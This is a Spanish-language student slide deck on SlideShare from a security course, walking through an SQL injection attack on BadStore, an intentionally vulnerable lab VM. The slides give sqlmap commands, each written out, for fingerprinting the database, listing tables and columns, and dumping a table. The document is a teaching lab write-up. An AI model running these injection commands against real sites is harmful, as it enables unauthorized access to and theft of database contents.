SlideShare a Scribd company logo
1 of 9
Download to read offline
Especialización en 
Seguridad Informática 
• Ataque por inyección de 
código SQL 
Estudiante: Daniel Felipe Palomo Luna 
Ibagué, Septiembre de 2014
Ataque por inyección de 
código SQL 
1. Teniendo la imagen 
ISO de BadStore 
configurada en una 
maquina virtual de 
Virtualbox, se procede 
a conocer la dirección 
IP asignada para 
ingresar vía web 
desde el equipo donde 
se realizara el ataque 
a la Base de Datos.
2. Luego de conocer la 
dirección IP, en este caso 
asignada la 192.168.1.3 
mediante DHCP, se 
procede a ingresar desde 
un navegador web para 
verificar el funcionamiento 
del servidor web. 
Ataque por inyección de 
código SQL
3. Dentro del sitio web, se 
debe explorar cada uno de 
los menús para visualizar 
las diferentes páginas 
alojadas, con esto se logra 
obtener en la URL la 
primera vulnerabilidad: 
Manejo de variables con 
métodos GET Y POST 
Variable encontrada: action 
Ataque por inyección de 
código SQL
Ataque por inyección de 
código SQL 
4. Al conocer una de las variables que maneja la página a nivel de programación, se 
logra el descubrimiento del motor y la versión de la Base de Datos con el siguiente 
comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b
Ataque por inyección de 
código SQL 
5. Obtención del nombre de la Base de Datos con el siguiente comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" 
--current-db
Ataque por inyección de 
código SQL 
6. Obtención del listado de tablas de la Base de Datos con el siguiente comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" 
--tables -D badstoredb
Ataque por inyección de 
código SQL 
7. Obtención del listado de columnas de la tabla itemdb de la Base de Datos con el 
siguiente comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" 
-D badstoredb -T itemdb --columns
Ataque por inyección de 
código SQL 
8. Visualización de los datos almacenados en la tabla itemdb de la Base de Datos con 
el siguiente comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" 
-D badstoredb -T itemdb -C ldesc --dump

More Related Content

What's hot

Servidor FTP con usuarios en MySQL
Servidor FTP con usuarios en MySQLServidor FTP con usuarios en MySQL
Servidor FTP con usuarios en MySQLCarlos Escribano
 
Practica de replicacion maestro esclavo en mysql
Practica de replicacion maestro esclavo en mysqlPractica de replicacion maestro esclavo en mysql
Practica de replicacion maestro esclavo en mysqlSinuhé Pérez Mtz
 
Manual Técnico Para Hacer Réplica
Manual Técnico Para Hacer RéplicaManual Técnico Para Hacer Réplica
Manual Técnico Para Hacer RéplicaAndrés Pizarro
 
Actividad No. 1.6: Creación de bases de datos en MySQL
Actividad No. 1.6: Creación de bases de datos en MySQLActividad No. 1.6: Creación de bases de datos en MySQL
Actividad No. 1.6: Creación de bases de datos en MySQLFrancisco Medina
 
Pendrive Linux
Pendrive LinuxPendrive Linux
Pendrive Linuxmallita
 

What's hot (7)

Servidor FTP con usuarios en MySQL
Servidor FTP con usuarios en MySQLServidor FTP con usuarios en MySQL
Servidor FTP con usuarios en MySQL
 
Practica de replicacion maestro esclavo en mysql
Practica de replicacion maestro esclavo en mysqlPractica de replicacion maestro esclavo en mysql
Practica de replicacion maestro esclavo en mysql
 
Manual Técnico Para Hacer Réplica
Manual Técnico Para Hacer RéplicaManual Técnico Para Hacer Réplica
Manual Técnico Para Hacer Réplica
 
Actividad No. 1.6: Creación de bases de datos en MySQL
Actividad No. 1.6: Creación de bases de datos en MySQLActividad No. 1.6: Creación de bases de datos en MySQL
Actividad No. 1.6: Creación de bases de datos en MySQL
 
Autentificacion sql antonio_hermoso
Autentificacion sql antonio_hermosoAutentificacion sql antonio_hermoso
Autentificacion sql antonio_hermoso
 
Respaldando bd
Respaldando bdRespaldando bd
Respaldando bd
 
Pendrive Linux
Pendrive LinuxPendrive Linux
Pendrive Linux
 

Similar to Ataque inyeccion sql

Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webDaycith Gonzalez
 
Presentacion practica seguridad bd
Presentacion practica seguridad bdPresentacion practica seguridad bd
Presentacion practica seguridad bdJaider Contreras
 
reto-by-q3rv0
reto-by-q3rv0reto-by-q3rv0
reto-by-q3rv0q3rv0
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxFrancisco Medina
 
Tutorial CodeIgniter + Netbeans 7
Tutorial CodeIgniter + Netbeans 7Tutorial CodeIgniter + Netbeans 7
Tutorial CodeIgniter + Netbeans 7Juan Fede
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesNextel S.A.
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesPablo Garaizar
 
William fabricio manual de sistemas sas
William fabricio manual de sistemas sasWilliam fabricio manual de sistemas sas
William fabricio manual de sistemas sasRafael Toro
 
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...Francisco Medina
 
Ataque masivo a WordPress con ILLOWP
Ataque masivo a WordPress con ILLOWPAtaque masivo a WordPress con ILLOWP
Ataque masivo a WordPress con ILLOWPQuantiKa14
 
Forense en WordPress
Forense en WordPressForense en WordPress
Forense en WordPressQuantiKa14
 
Creación de una base de datos en el hosting
Creación de una base de datos en el hostingCreación de una base de datos en el hosting
Creación de una base de datos en el hostingOSCARANDRESALBAPADRO
 
Introducción a las vulnerabilidades web
Introducción a las vulnerabilidades webIntroducción a las vulnerabilidades web
Introducción a las vulnerabilidades webPablo Garaizar
 
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEBATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEBMorely Garcia Leon
 
CouchDB y el desarrollo de aplicaciones Android
CouchDB y el desarrollo de aplicaciones AndroidCouchDB y el desarrollo de aplicaciones Android
CouchDB y el desarrollo de aplicaciones AndroidRicardo Monagas Medina
 
Infografia farmacia laravel
Infografia farmacia laravelInfografia farmacia laravel
Infografia farmacia laravelFUNDET ECUADOR
 
Ataques a-bases-de-datos
Ataques a-bases-de-datosAtaques a-bases-de-datos
Ataques a-bases-de-datosalan moreno
 

Similar to Ataque inyeccion sql (20)

Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio web
 
Presentacion practica seguridad bd
Presentacion practica seguridad bdPresentacion practica seguridad bd
Presentacion practica seguridad bd
 
reto-by-q3rv0
reto-by-q3rv0reto-by-q3rv0
reto-by-q3rv0
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
 
Tutorial CodeIgniter + Netbeans 7
Tutorial CodeIgniter + Netbeans 7Tutorial CodeIgniter + Netbeans 7
Tutorial CodeIgniter + Netbeans 7
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
William fabricio manual de sistemas sas
William fabricio manual de sistemas sasWilliam fabricio manual de sistemas sas
William fabricio manual de sistemas sas
 
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
 
Symfony Parte 2
Symfony Parte 2Symfony Parte 2
Symfony Parte 2
 
Ataque masivo a WordPress con ILLOWP
Ataque masivo a WordPress con ILLOWPAtaque masivo a WordPress con ILLOWP
Ataque masivo a WordPress con ILLOWP
 
Forense en WordPress
Forense en WordPressForense en WordPress
Forense en WordPress
 
Creación de una base de datos en el hosting
Creación de una base de datos en el hostingCreación de una base de datos en el hosting
Creación de una base de datos en el hosting
 
Introducción a las vulnerabilidades web
Introducción a las vulnerabilidades webIntroducción a las vulnerabilidades web
Introducción a las vulnerabilidades web
 
Deploying Wordpress
Deploying WordpressDeploying Wordpress
Deploying Wordpress
 
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEBATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
 
CouchDB y el desarrollo de aplicaciones Android
CouchDB y el desarrollo de aplicaciones AndroidCouchDB y el desarrollo de aplicaciones Android
CouchDB y el desarrollo de aplicaciones Android
 
Infografia farmacia laravel
Infografia farmacia laravelInfografia farmacia laravel
Infografia farmacia laravel
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
Ataques a-bases-de-datos
Ataques a-bases-de-datosAtaques a-bases-de-datos
Ataques a-bases-de-datos
 

Recently uploaded

PRESENTACION DE "CASO NOKIA" // PDF.EDU.
PRESENTACION DE "CASO NOKIA" // PDF.EDU.PRESENTACION DE "CASO NOKIA" // PDF.EDU.
PRESENTACION DE "CASO NOKIA" // PDF.EDU.SARA BUENDIA RIOJA
 
Violencia sexual a través de Internet [ICAS 2024]
Violencia sexual a través de Internet [ICAS 2024]Violencia sexual a través de Internet [ICAS 2024]
Violencia sexual a través de Internet [ICAS 2024]QuantiKa14
 
Taller Evaluativo Tecnologías Web 2.0.docx
Taller Evaluativo Tecnologías Web 2.0.docxTaller Evaluativo Tecnologías Web 2.0.docx
Taller Evaluativo Tecnologías Web 2.0.docxSANTIAGOREYES92
 
Perspectivas en ciberseguridad para el año 2024
Perspectivas en ciberseguridad para el año 2024Perspectivas en ciberseguridad para el año 2024
Perspectivas en ciberseguridad para el año 2024Educática
 
La electricidad y la electrónica.pdf.iluw
La electricidad y la electrónica.pdf.iluwLa electricidad y la electrónica.pdf.iluw
La electricidad y la electrónica.pdf.iluwDanielaEspaa3
 
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024Mariano Cabrera Lanfranconi
 
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdf
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdfCuadernillo de Comunicación 1. Primer grado de Primaria.pdf
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdfRosaAmeliaLlacsahuan
 

Recently uploaded (7)

PRESENTACION DE "CASO NOKIA" // PDF.EDU.
PRESENTACION DE "CASO NOKIA" // PDF.EDU.PRESENTACION DE "CASO NOKIA" // PDF.EDU.
PRESENTACION DE "CASO NOKIA" // PDF.EDU.
 
Violencia sexual a través de Internet [ICAS 2024]
Violencia sexual a través de Internet [ICAS 2024]Violencia sexual a través de Internet [ICAS 2024]
Violencia sexual a través de Internet [ICAS 2024]
 
Taller Evaluativo Tecnologías Web 2.0.docx
Taller Evaluativo Tecnologías Web 2.0.docxTaller Evaluativo Tecnologías Web 2.0.docx
Taller Evaluativo Tecnologías Web 2.0.docx
 
Perspectivas en ciberseguridad para el año 2024
Perspectivas en ciberseguridad para el año 2024Perspectivas en ciberseguridad para el año 2024
Perspectivas en ciberseguridad para el año 2024
 
La electricidad y la electrónica.pdf.iluw
La electricidad y la electrónica.pdf.iluwLa electricidad y la electrónica.pdf.iluw
La electricidad y la electrónica.pdf.iluw
 
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
Charla eCommerce Day Bolivia 2024 - Comercio Electrónico en Bolivia 2024
 
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdf
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdfCuadernillo de Comunicación 1. Primer grado de Primaria.pdf
Cuadernillo de Comunicación 1. Primer grado de Primaria.pdf
 

Ataque inyeccion sql

  • 1. Especialización en Seguridad Informática • Ataque por inyección de código SQL Estudiante: Daniel Felipe Palomo Luna Ibagué, Septiembre de 2014
  • 2. Ataque por inyección de código SQL 1. Teniendo la imagen ISO de BadStore configurada en una maquina virtual de Virtualbox, se procede a conocer la dirección IP asignada para ingresar vía web desde el equipo donde se realizara el ataque a la Base de Datos.
  • 3. 2. Luego de conocer la dirección IP, en este caso asignada la 192.168.1.3 mediante DHCP, se procede a ingresar desde un navegador web para verificar el funcionamiento del servidor web. Ataque por inyección de código SQL
  • 4. 3. Dentro del sitio web, se debe explorar cada uno de los menús para visualizar las diferentes páginas alojadas, con esto se logra obtener en la URL la primera vulnerabilidad: Manejo de variables con métodos GET Y POST Variable encontrada: action Ataque por inyección de código SQL
  • 5. Ataque por inyección de código SQL 4. Al conocer una de las variables que maneja la página a nivel de programación, se logra el descubrimiento del motor y la versión de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b
  • 6. Ataque por inyección de código SQL 5. Obtención del nombre de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-db
  • 7. Ataque por inyección de código SQL 6. Obtención del listado de tablas de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb
  • 8. Ataque por inyección de código SQL 7. Obtención del listado de columnas de la tabla itemdb de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -D badstoredb -T itemdb --columns
  • 9. Ataque por inyección de código SQL 8. Visualización de los datos almacenados en la tabla itemdb de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -D badstoredb -T itemdb -C ldesc --dump